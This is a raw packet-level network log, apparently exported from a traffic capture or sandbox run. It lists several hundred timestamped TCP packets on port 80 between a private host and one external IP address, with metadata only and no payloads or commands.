Jan 1, 2025 08:54:01.828604937 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828717947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828728914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828777075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.829075098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829087019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829097986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829134941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.829226017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829237938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829247952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829258919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829279900 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.829369068 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.829391956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.829478979 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.913986921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914007902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914020061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914063931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914119959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914211988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914222956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914235115 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914259911 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914330959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914343119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914377928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914391994 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914402962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914421082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914421082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914434910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914549112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914561033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914571047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914582014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914592028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914601088 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914623022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914721966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914772034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914779902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914840937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914853096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914864063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.914896011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.914998055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915009022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915043116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915050983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915057898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915070057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915080070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915108919 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915158033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915251017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915304899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915324926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915361881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915460110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915472984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915482998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915488958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915508032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915532112 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915702105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915714025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915724039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915735006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915745974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915767908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915801048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915801048 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915864944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915878057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915889025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915900946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915911913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.915934086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.915962934 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916146994 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916157961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916167974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916184902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916196108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916197062 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916212082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916218042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916224957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916234970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916246891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916254997 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916256905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916270018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916300058 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916337013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916627884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916639090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916650057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916752100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916766882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916812897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916825056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916841984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916898012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.916965008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916976929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.916992903 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917002916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917013884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917362928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917375088 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917378902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917391062 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917402029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917412996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917423010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917428970 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917433977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917444944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917447090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917459011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917469025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917474031 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917488098 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917512894 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917670012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917730093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917742014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917794943 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917874098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917892933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917906046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917917013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.917922974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.917948961 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918128967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918143034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918153048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918163061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918171883 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918173075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918185949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918195963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918200970 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918210030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918219090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918221951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918237925 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918270111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918538094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918554068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918570995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918602943 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918694019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918705940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918715954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918728113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918754101 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918772936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.918868065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918879032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918889046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918900013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918910980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918921947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918931961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.918942928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.919037104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.924094915 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.004998922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005023003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005075932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005086899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005148888 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005162001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005192995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005254984 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005276918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005289078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005299091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005307913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005336046 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005373001 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005403996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005414963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005445957 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005454063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005522966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005533934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005575895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005675077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005685091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005700111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005706072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005716085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005721092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005852938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005856037 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005865097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005877018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005897999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.005980015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.005990028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006000996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006032944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006086111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006112099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006123066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006133080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006143093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006153107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006177902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006191969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006366014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006377935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006393909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006405115 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006416082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006426096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006436110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006447077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006447077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006473064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006634951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006647110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006658077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006664038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006683111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006692886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006702900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006710052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.006721973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006721973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.006778002 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.007153034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007163048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007168055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007173061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007179022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007184029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007189035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007194996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007200956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007205963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007211924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007220984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007226944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007239103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007244110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007251024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.007289886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.007309914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.007808924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.009969950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010010958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010021925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010047913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010066032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010072947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010082960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010138035 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010155916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010168076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010178089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010220051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010364056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010375023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010385036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010395050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010406017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010409117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010416985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010458946 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010489941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010500908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010535955 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010546923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010557890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010567904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010616064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010616064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010652065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010664940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010674953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010704994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010759115 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010770082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010782003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010799885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010821104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.010890961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010973930 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010986090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.010996103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011003971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011014938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011018038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011059999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011121035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011132002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011173964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011265993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011276960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011286020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011296988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011308908 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011316061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011328936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011338949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011348963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011358976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011363029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011363029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011415958 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011591911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011603117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011612892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011622906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011634111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011645079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011651039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011684895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011684895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011778116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011789083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011800051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011807919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.011833906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.011856079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.098602057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098615885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098627090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098721027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.098743916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098753929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098764896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098777056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098784924 CET	49730	80	192.168.2.4	147.45.44.131
